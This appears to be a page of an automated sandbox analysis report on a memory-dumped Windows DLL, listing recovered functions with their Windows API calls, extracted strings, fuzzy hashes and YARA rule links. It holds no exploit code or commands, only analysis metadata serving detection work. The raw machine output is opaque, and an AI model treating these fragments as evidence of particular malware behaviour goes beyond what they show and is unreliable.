Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientColorCreateDeleteDeviceDrawFontMetricsRect
String ID: %s%d.%d%s$%s%s%s$K;(Io$[N/A]
API String ID: 938400745-2402146638
Opcode ID: 2865e05e81ce667e904530b46d2bc26635c7059a5dc124e6c2700107af15b79e
Instruction ID: ae28c163bb485ebac6115799cac507ad1645cd10f0a9147d7a9b79484e16e8f3
Opcode Fuzzy Hash: 2865e05e81ce667e904530b46d2bc26635c7059a5dc124e6c2700107af15b79e
Instruction Fuzzy Hash: 13C18C75A002299BDB20CF64CCC5ADAB7B9BF59304F1481E9E509EB251E730AEC5CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08EA0, Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 405memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,49283B4B,76AFD5B0,00000000), ref: 6EA08F44
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA08F52
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,49283B4B,76AFD5B0,00000000), ref: 6EA08F6F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6EA08F88
SysFreeString.OLEAUT32(00000000), ref: 6EA08F97
SysFreeString.OLEAUT32(00000000), ref: 6EA09234
SysFreeString.OLEAUT32(00000000), ref: 6EA09286
_com_issue_error.COMSUPP ref: 6EA09294
Concurrency::cancel_current_task.LIBCPMT ref: 6EA09299
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA092A4

Strings

line, xrefs: 6EA08F3B, 6EA08F66
Arial, xrefs: 6EA08FAD
K;(Io, xrefs: 6EA08EB4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstrConcurrency::cancel_current_task_com_issue_error
String ID: Arial$K;(Io$line
API String ID: 3866382671-604593629
Opcode ID: 3a207231089f54443607b37602d5186c82fb3603b1ac45e6dac06c0190f04b32
Instruction ID: 68ac6296af8df7a2e5baa948811c3e0a9eaec63ef596cf16f6d657401fb28951
Opcode Fuzzy Hash: 3a207231089f54443607b37602d5186c82fb3603b1ac45e6dac06c0190f04b32
Instruction Fuzzy Hash: 5CE1E370901309DFDB10CFE8DA94BAEBBB5BF89318F14451DE405AB380D774AA85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17640, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6EA07CE5,6EA07CE7,00000000,00000000,49283B4B,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA176C9
__alloca_probe_16.LIBCMT ref: 6EA176EE
MultiByteToWideChar.KERNEL32(00000000,00000000,6EA07CE5,?,00000000,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17744
SysAllocString.OLEAUT32(00000000), ref: 6EA1774F
_com_issue_error.COMSUPP ref: 6EA17778
_com_issue_error.COMSUPP ref: 6EA17782
GetLastError.KERNEL32(80070057,49283B4B,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17787
_com_issue_error.COMSUPP ref: 6EA1779A
GetLastError.KERNEL32(00000000,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA177B0
_com_issue_error.COMSUPP ref: 6EA177C3

Strings

K;(I, xrefs: 6EA1773C
@Mt, xrefs: 6EA17787, 6EA177B0
K;(Io, xrefs: 6EA17659

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
String ID: @Mt$K;(I$K;(Io
API String ID: 3079088546-189366787
Opcode ID: 1d706ff189e7a149a796f4a476e04db09740852a590acd787d2b5f563d60bf34
Instruction ID: d9fbd38216e41a5f1f652b42fe6aa29a4b5c24e996be020eba53423718b7f605
Opcode Fuzzy Hash: 1d706ff189e7a149a796f4a476e04db09740852a590acd787d2b5f563d60bf34
Instruction Fuzzy Hash: 51411AB5A083159FDB10CFE8CC44BDEBBA9EB46714F144629F519E7280D7349881CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA31B90, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6EA31BD4

Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33334
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33346
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33358
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3336A
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3337C
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3338E
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333A0
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333B2
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333C4
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333D6
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333E8
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333FA
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3340C

_free.LIBCMT ref: 6EA31BC9

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA31BEB
_free.LIBCMT ref: 6EA31C00
_free.LIBCMT ref: 6EA31C0B
_free.LIBCMT ref: 6EA31C2D
_free.LIBCMT ref: 6EA31C40
_free.LIBCMT ref: 6EA31C4E
_free.LIBCMT ref: 6EA31C59
_free.LIBCMT ref: 6EA31C91
_free.LIBCMT ref: 6EA31C98
_free.LIBCMT ref: 6EA31CB5
_free.LIBCMT ref: 6EA31CCD

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b069bfa1c058cd8ce955084d7a4966828f197ab802783e54abe34e67a4dfc801
Instruction ID: b1e9e4c152ad0e78abb79accc90c1bcb84d6a54b2da9c3c941c4e5efd4285a94
Opcode Fuzzy Hash: b069bfa1c058cd8ce955084d7a4966828f197ab802783e54abe34e67a4dfc801
Instruction Fuzzy Hash: 40316D316047259FEB549BB9D944BA677E8FF40314F288C39E4A8E7194DF34ACC48758

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2FECD, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

@Mt, xrefs: 6EA30184, 6EA30226
, xrefs: 6EA30155

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $@Mt
API String ID: 0-580020321
Opcode ID: dd1eecc2f0fd19f9700a8b484c9a88505388602bdc8883fd37316a8a83dabf01
Instruction ID: 5c204a98e6b114263d81060ffa2edfaaaed0cc06b7fae3f68affc744963b0f57
Opcode Fuzzy Hash: dd1eecc2f0fd19f9700a8b484c9a88505388602bdc8883fd37316a8a83dabf01
Instruction Fuzzy Hash: 5EC1F370A042159FDF15CFD9C890BADBBB5BF4A314F284469E514FB282D73199C2CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA123E0, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12414
GetClassInfoExW.USER32 ref: 6EA12449
GetClassInfoExW.USER32 ref: 6EA1245C
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12467
LoadCursorW.USER32(6EA00000,?), ref: 6EA124B9
GetClassInfoExW.USER32 ref: 6EA1250F
RegisterClassExW.USER32 ref: 6EA1251F
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA125B2

Strings

0, xrefs: 6EA12442
K;(Io, xrefs: 6EA123E6
ATL:%p, xrefs: 6EA124D9

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: 0$ATL:%p$K;(Io
API String ID: 269841140-1454413399
Opcode ID: 1b9e4467827effa1b0c6badbd29063c2a3600b13b15c8f885f8a55d8fafc7c42
Instruction ID: c59bc22389ebc3f1c138595c842f3c0b8c3e80b0112eb83cd7ba620dab8c64a5
Opcode Fuzzy Hash: 1b9e4467827effa1b0c6badbd29063c2a3600b13b15c8f885f8a55d8fafc7c42
Instruction Fuzzy Hash: 6461C831904B15CFEB20DFA9C99069AB7F5FF4A314B048A1DE84AAB650E731F8C5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04E00, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA04E3F
std::_Lockit::_Lockit.LIBCPMT ref: 6EA04E61
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04E81
std::_Facet_Register.LIBCPMT ref: 6EA04FEA
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA05002
Concurrency::cancel_current_task.LIBCPMT ref: 6EA05024
Concurrency::cancel_current_task.LIBCPMT ref: 6EA05029
Concurrency::cancel_current_task.LIBCPMT ref: 6EA0502E

Strings

false, xrefs: 6EA04F95
true, xrefs: 6EA04FBB
K;(Io, xrefs: 6EA04E17

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: K;(Io$false$true
API String ID: 3742692055-1594784146
Opcode ID: f4e1e10a297c27d5df3e33e96241a49054fc43aef27ed63ced8ddef517a133be
Instruction ID: 56deb4fd6ae6746643de7fb1b184bdbc23bc04a09a03cacb648ee130e4d6ef6b
Opcode Fuzzy Hash: f4e1e10a297c27d5df3e33e96241a49054fc43aef27ed63ced8ddef517a133be
Instruction Fuzzy Hash: C461A870904305CFEB21DFE4D940BDABBB4BF45708F14895DE815AB280DB76AA86CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33415, Relevance: 18.4, APIs: 12, Instructions: 375COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA3345D
_free.LIBCMT ref: 6EA33481
_free.LIBCMT ref: 6EA3348E
_free.LIBCMT ref: 6EA334B3
_free.LIBCMT ref: 6EA334C0
_free.LIBCMT ref: 6EA334C9
_free.LIBCMT ref: 6EA337A4
_free.LIBCMT ref: 6EA337AC

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d3fdcf04cc7da7ea830c8fd1e163b9f250539c92ba858366e3c31966eaa63f75
Instruction ID: e0a7f3a076a8212d5685bab48cd2c1bfc1a10f13a9d02bdb38ddc6eda59da211
Opcode Fuzzy Hash: d3fdcf04cc7da7ea830c8fd1e163b9f250539c92ba858366e3c31966eaa63f75
Instruction Fuzzy Hash: B4C130B2D40218AFDB10CBE8CD86FDA77FCAF48704F184565FA54FB285D67099848B64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA238F1, Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 493COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6EA23D04

Strings

p, xrefs: 6EA239E5
p, xrefs: 6EA23A01
p, xrefs: 6EA23A47
f, xrefs: 6EA239FA
A, xrefs: 6EA23AB8
f, xrefs: 6EA23A40
Z, xrefs: 6EA23AC2
f, xrefs: 6EA239DE
:, xrefs: 6EA239B8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$A$Z$f$f$f$p$p$p
API String ID: 1302938615-2466996737
Opcode ID: 53e8e950c758bcd4a221d41e3e8ec0d1d684ba5dbaf4fc49d3bf31e6fbadd9ac
Instruction ID: 75577019c54167d0a9a5ba0a4e40e4306addce0faf9da74302adb9d2791be5e4
Opcode Fuzzy Hash: 53e8e950c758bcd4a221d41e3e8ec0d1d684ba5dbaf4fc49d3bf31e6fbadd9ac
Instruction Fuzzy Hash: C8127F3590025B8EEB208FEAD8486DDBBB2FB42B14F684575D4947B284D3704ECCCB1A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19E3A, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6EA19F37
type_info::operator==.LIBVCRUNTIME ref: 6EA19F59
___TypeMatch.LIBVCRUNTIME ref: 6EA1A068
IsInExceptionSpec.LIBVCRUNTIME ref: 6EA1A13A
_UnwindNestedFrames.LIBCMT ref: 6EA1A1BE
CallUnexpected.LIBVCRUNTIME ref: 6EA1A1D9

Strings

csm, xrefs: 6EA19EE4
csm, xrefs: 6EA19F90
csm, xrefs: 6EA19E77

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 788867cfd4b5adb213cf51f02e53444009d6a37570bc6b0b4292692cbc46c2c8
Instruction ID: ba167ba8c0b184eb5416caece4d1dd3a93d904aafa968d0d9d47fa430f7291f9
Opcode Fuzzy Hash: 788867cfd4b5adb213cf51f02e53444009d6a37570bc6b0b4292692cbc46c2c8
Instruction Fuzzy Hash: 5CB1A97180820AEFCF05CFE4CA809DEBBBABF04314F154959E8156B255D331EA99CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA16D5F, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6EA16DA8
__alloca_probe_16.LIBCMT ref: 6EA16DD4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6EA16E13
LCMapStringEx.KERNEL32 ref: 6EA16E30
LCMapStringEx.KERNEL32 ref: 6EA16E6F
__alloca_probe_16.LIBCMT ref: 6EA16E8C
LCMapStringEx.KERNEL32 ref: 6EA16ECE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6EA16EF1

Strings

K;(Io, xrefs: 6EA16D65

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID: K;(Io
API String ID: 2040435927-79920696
Opcode ID: a9c38b03f68b4a7e8a5d30ba7690525a40ee3e347b5883fefce0c46151864682
Instruction ID: 0308deca000c083fa69e7943c8ec0f033795112f1518e4d8202e39cac324e931
Opcode Fuzzy Hash: a9c38b03f68b4a7e8a5d30ba7690525a40ee3e347b5883fefce0c46151864682
Instruction Fuzzy Hash: A251C372518216AFEF108FE4CC54FEB3BA9EF85754F154528F924EA290D734CC918B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10400, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6EA10418
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6EA10445
MulDiv.KERNEL32(00000008,00000000), ref: 6EA1044E
CreateFontW.GDI32(00000000), ref: 6EA10457
ReleaseDC.USER32 ref: 6EA10464
SetTimer.USER32 ref: 6EA10479

Part of subcall function 6EA112B0: BeginPaint.USER32(?,?), ref: 6EA112F3
Part of subcall function 6EA112B0: GetParent.USER32(?), ref: 6EA112FC
Part of subcall function 6EA112B0: GetClientRect.USER32 ref: 6EA11312
Part of subcall function 6EA112B0: CreateCompatibleDC.GDI32(?), ref: 6EA11318
Part of subcall function 6EA112B0: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
Part of subcall function 6EA112B0: SelectObject.GDI32(00000000,00000000), ref: 6EA11346
Part of subcall function 6EA112B0: SelectObject.GDI32(00000000,?), ref: 6EA11358
Part of subcall function 6EA112B0: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
Part of subcall function 6EA112B0: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
Part of subcall function 6EA112B0: SetBkMode.GDI32(?,00000001), ref: 6EA11388
Part of subcall function 6EA112B0: SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
Part of subcall function 6EA112B0: GetClientRect.USER32 ref: 6EA113A6
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113B4
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113C9
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113EB

DeleteObject.GDI32(?), ref: 6EA104A0

Strings

Arial, xrefs: 6EA1041E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 5aa0e312809fd896f139547b3e08930bf173c4036d42df54c00ddf5eb86e4850
Instruction ID: a7647b02fd546192c019e7735429b0cdb8fcea2d18c1f3f41ed4351756aebe72
Opcode Fuzzy Hash: 5aa0e312809fd896f139547b3e08930bf173c4036d42df54c00ddf5eb86e4850
Instruction Fuzzy Hash: 7A31E431244705AFEB609FA8DC85B9A77A5FB56321F108112F505DA2E0D7B1ECB2CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17520, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,6EA0ABAD,6EA0ABAC,00000000,00000000,00000000,00000000,49283B4B,00000000,?,00000000,6EA0ABAD,?,?), ref: 6EA17593
WideCharToMultiByte.KERNEL32(00000000,00000000,6EA0ABAD,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6EA175CA

Strings

@Mt, xrefs: 6EA17601, 6EA17622
K;(Io, xrefs: 6EA17537

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: @Mt$K;(Io
API String ID: 626452242-206996876
Opcode ID: c97faea24f5bf102c8bfff8bf2fbd8f4780679a966ef7af3c140124cac1745d8
Instruction ID: b0ba191f25c71c495aad4dbd233f26456838a409fd8e8b8855cbb6821908b036
Opcode Fuzzy Hash: c97faea24f5bf102c8bfff8bf2fbd8f4780679a966ef7af3c140124cac1745d8
Instruction Fuzzy Hash: 78318276648305ABDB10CFE4CC45FEB77ACEB41B64F144529F919EB2C0D7319941C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D3E0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,49283B4B,?,?,?,6EA38C60,000000FF), ref: 6EA0D419
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6EA0D429
GetModuleHandleW.KERNEL32(Advapi32.dll,49283B4B,?,?,?,6EA38C60,000000FF), ref: 6EA0D489
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6EA0D499
RegDeleteKeyW.ADVAPI32(?,?), ref: 6EA0D4E8

Strings

RegDeleteKeyExW, xrefs: 6EA0D493
K;(Io, xrefs: 6EA0D3F3
Advapi32.dll, xrefs: 6EA0D414, 6EA0D484
RegDeleteKeyTransactedW, xrefs: 6EA0D423

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$K;(Io$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-3538098817
Opcode ID: 24393765d0b7e5aba51481521bf925eb8d0cc5bebdc18ca51e763a2e5d1f1f2a
Instruction ID: 41f4f8dfe47a8d27a155e0e1156996caf7f019277ec5f49d91ed70b196b6eeb8
Opcode Fuzzy Hash: 24393765d0b7e5aba51481521bf925eb8d0cc5bebdc18ca51e763a2e5d1f1f2a
Instruction Fuzzy Hash: 5231D236608604EFEB21CF98E804B55BBA4FB46720F04C12AF905EB680D777B491CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28836, Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2884C

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA28858
_free.LIBCMT ref: 6EA28863
_free.LIBCMT ref: 6EA2886E
_free.LIBCMT ref: 6EA28879
_free.LIBCMT ref: 6EA28884
_free.LIBCMT ref: 6EA2888F
_free.LIBCMT ref: 6EA2889A
_free.LIBCMT ref: 6EA288A5
_free.LIBCMT ref: 6EA288B3

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 50c0dedc72bc8c1ffc6054799a9f43881a311ba6f46842139ab9dcc925e67710
Instruction ID: 9a9b4e841c85c9181815c02bb6068fe8700e4e1eeb6e0f76beb28388ad05dc08
Opcode Fuzzy Hash: 50c0dedc72bc8c1ffc6054799a9f43881a311ba6f46842139ab9dcc925e67710
Instruction Fuzzy Hash: E021EB76900108AFCB05DFD4C980DDE7BB9FF48244F0449B6F929AB160EB35DA94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E483, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 319fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EA2E4CB
__fassign.LIBCMT ref: 6EA2E6AA
__fassign.LIBCMT ref: 6EA2E6C7
WriteFile.KERNEL32(?,6EA2685B,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EA2E70F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EA2E74F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EA2E7FB

Strings

@Mt, xrefs: 6EA2E7FB
K;(Io, xrefs: 6EA2E48E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID: @Mt$K;(Io
API String ID: 4031098158-206996876
Opcode ID: 23e1456a16301933ed5beb76b5c6504f511e7a577657782e29db46ece0a07d83
Instruction ID: 2f97c3781b3be9ac42af422a1b0eb9696ac7580944b7d858ab7074670d6ba775
Opcode Fuzzy Hash: 23e1456a16301933ed5beb76b5c6504f511e7a577657782e29db46ece0a07d83
Instruction Fuzzy Hash: B1D1BB71D002589FDF12CFE8C9809EDBBB5AF49314F28816AE855BB241E731A986CF54

Uniqueness

Uniqueness Score: -1.00%

